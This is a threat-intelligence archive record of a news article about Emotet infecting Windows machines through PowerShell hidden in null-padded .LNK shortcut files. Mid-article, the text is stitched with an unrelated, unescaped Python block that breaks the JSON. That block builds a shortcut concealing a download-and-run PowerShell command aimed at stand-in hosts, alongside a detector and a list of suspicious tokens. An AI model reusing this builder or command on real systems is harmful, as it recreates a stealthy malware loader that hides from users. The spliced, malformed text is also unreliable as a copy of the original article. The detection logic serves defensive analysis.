{
	"id": "154e790b-5fe4-41ef-834f-6e589acd8a37",
	"created_at": "2026-04-06T00:19:56.844093Z",
	"updated_at": "2026-04-10T03:21:16.884595Z",
	"deleted_at": null,
	"sha1_hash": "e6dde12567e95688fab1e98a48a48248703b8f70",
	"title": "Emotet malware now installs via PowerShell in Windows shortcut files",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1883611,
	"plain_text": "Emotet malware now installs via PowerShell in Windows shortcut files\r\nBy Ionut Ilascu\r\nPublished: 2022-04-26 · Archived: 2026-04-05 15:49:45 UTC\r\nThe Emotet botnet is now using Windows shortcut files (.LNK) containing PowerShell commands to infect victims'\r\ncomputers, moving away from Microsoft Office macros, which are now disabled by default.\r\nThe use of .LNK files is not new: the Emotet gang previously used them in combination with Visual Basic Script (VBS)\r\ncode to build a command that downloads the payload. However, this is the first time they have used Windows shortcuts to\r\ndirectly execute PowerShell commands.\r\nNew technique after botched campaign\r\nLast Friday, Emotet operators pulled the plug on a phishing campaign because they botched their installer after using a static\r\nfile name to reference the malicious .LNK shortcut.\r\nhttps://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/\r\nPage 1 of 4\r\nLaunching the shortcut would trigger a command that extracted a string of VBS code and added it to a VBS file to execute.\r\nHowever, because the distributed shortcut files had a different name than the static one the command looked for, it would fail to\r\ncreate the VBS file correctly. 
The gang fixed the problem yesterday.\r\nToday, security researchers noticed that Emotet switched to a new technique that uses PowerShell commands attached to the\r\n.LNK file to download and execute a script on the infected computer.\r\nThe malicious string appended to the .LNK file is obfuscated and padded with nulls (which render as blank space) so that it does not show in\r\nthe Target field (the file the shortcut points to) of the file’s Properties dialog box.\r\n[Image: source: BleepingComputer]\r\nEmotet’s malicious .LNK file includes URLs for several compromised websites used to host the PowerShell script\r\npayload. If the script is present at one of the defined locations, it is downloaded to the system’s temporary folder as a\r\nPowerShell script with a random name.\r\nBelow is the deobfuscated version of the malicious string Emotet attached to the .LNK payload:\r\n[Image: source: BleepingComputer]\r\nThis script generates and launches another PowerShell script that downloads the Emotet malware from a list of\r\ncompromised sites and saves it to the %Temp% folder. 
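The shortcut anatomy described above (a PowerShell command hidden behind null padding in the argument string, a download loop over several hosting URLs, a randomly named script in the temporary folder) can be checked mechanically from the .LNK bytes. The following Python is an added example and not code from the article or from any Emotet sample: it builds a minimal Shell Link with a constructed, non-functional first-stage command (the example.invalid URLs, the helper names, the token list and the 260-character visible-field threshold are assumptions made here), parses the StringData section of the MS-SHLLINK format, and flags the padding, the oversized argument string and the suspicious tokens a triage script would look for.

```python
import re
import struct

# LinkFlags bits from the Shell Link binary format (MS-SHLLINK 2.1.1).
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
STRING_DATA = [(HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
               (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
               (HAS_ICON_LOCATION, "icon_location")]

# Heuristic token list (an assumption) for a shortcut's target, working dir and arguments.
SUSPICIOUS = re.compile(
    r"powershell|pwsh|regsvr32|rundll32|mshta|wscript|cscript|https?://|"
    r"-enc\b|frombase64string|downloadfile|downloadstring|invoke-expression|\biex\b", re.I)
PADDING = "\x00 \t"           # characters used to push the payload out of the visible Target field
TARGET_FIELD_VISIBLE = 260    # MAX_PATH; assumption about how much of the field the dialog shows


def build_lnk(relative_path, arguments, working_dir=""):
    """Build a minimal, well-formed .LNK (header + StringData + terminal block).

    Constructed for this example only; it is not an Emotet artifact.
    """
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    if working_dir:
        flags |= HAS_WORKING_DIR
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags)
    header += b"\x00" * (0x4C - len(header))   # attributes, timestamps, icon, hotkey: zeroed

    def string_data(s):                        # CountCharacters (u16) + UTF-16LE characters
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    body = string_data(relative_path)
    if working_dir:
        body += string_data(working_dir)
    body += string_data(arguments)
    return header + body + struct.pack("<I", 0)  # TerminalBlock closes the ExtraData section


def parse_lnk(data):
    """Return the StringData fields of a Shell Link as a dict."""
    if struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:           # skip LinkTargetIDList (u16 size + items)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                     # skip LinkInfo (u32 size includes itself)
        off += struct.unpack_from("<I", data, off)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    fields = {}
    for bit, name in STRING_DATA:
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            fields[name] = data[off:off + count * width].decode(codec)
            off += count * width
    return fields


def scan_lnk(data):
    """Parse a shortcut and return (fields, findings) for the hidden-PowerShell pattern."""
    fields = parse_lnk(data)
    args = fields.get("arguments", "")
    findings = []
    lead = len(args) - len(args.lstrip(PADDING))   # run of nulls/blanks before the real command
    if lead >= 16:
        findings.append(("padded_arguments", lead))
    if len(args) > TARGET_FIELD_VISIBLE:
        findings.append(("oversized_arguments", len(args)))
    haystack = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
    tokens = sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(haystack)})
    if tokens:
        findings.append(("suspicious_tokens", tokens))
    return fields, findings


# Constructed samples: one mimicking the described pattern, one benign shortcut.
FIRST_STAGE = ("-w hidden -nop -c \"$u='http://example.invalid/a/','http://example.invalid/b/';"
               "foreach($x in $u){try{$p=$env:TEMP+'\\'+[guid]::NewGuid()+'.ps1';"
               "(New-Object Net.WebClient).DownloadFile($x,$p);& $p;break}catch{}}\"")
SAMPLE_HIDDEN = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "\x00" * 300 + FIRST_STAGE)                  # 300 nulls push the command out of view
SAMPLE_BENIGN = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "readme.txt")

if __name__ == "__main__":
    for label, blob in (("hidden", SAMPLE_HIDDEN), ("benign", SAMPLE_BENIGN)):
        fields, findings = scan_lnk(blob)
        print(label, fields["relative_path"], findings)
```

Run it on real files by replacing the constructed blobs with `open(path, "rb").read()`; the parser stops at the StringData section, which is where the argument string lives, so the LinkTargetIDList and LinkInfo blocks are skipped by their own size fields rather than decoded.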
The downloaded DLL is then executed using the regsvr32.exe\r\ncommand.\r\nThe execution chain thus runs from the .LNK file through PowerShell to the regsvr32.exe command-line utility and ends with\r\nEmotet downloaded and launched.\r\nSecurity researcher Max Malyutin says that along with using PowerShell in LNK files, this execution flow is new to Emotet\r\nmalware deployment.\r\nNew technique on the rise\r\nThe Cryptolaemus researcher group, which is closely monitoring Emotet activity, notes that the new technique is a clear\r\nattempt by the threat actor to bypass defenses and automated detection.\r\nSecurity researchers at cybersecurity company ESET also noticed that the use of the new Emotet technique has increased in\r\nthe past 24 hours.\r\nESET’s telemetry data shows that the countries most affected by Emotet via the new technique are Mexico, Italy, Japan,\r\nTurkey, and Canada.\r\nApart from switching to PowerShell in .LNK files, the Emotet botnet operators have made a few other changes since they\r\nresumed activity at steadier levels in November, such as moving to 64-bit modules.\r\nThe malware is typically used as a gateway for other malware, particularly ransomware threats like Conti.\r\nSource: https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/"
	],
	"report_names": [
		"emotet-malware-now-installs-via-powershell-in-windows-shortcut-files"
	],
	"threat_actors": [],
	"ts_created_at": 1775434796,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/e6dde12567e95688fab1e98a48a48248703b8f70.pdf",
		"text": "https://archive.orkl.eu/e6dde12567e95688fab1e98a48a48248703b8f70.txt",
		"img": "https://archive.orkl.eu/e6dde12567e95688fab1e98a48a48248703b8f70.jpg"
	}
}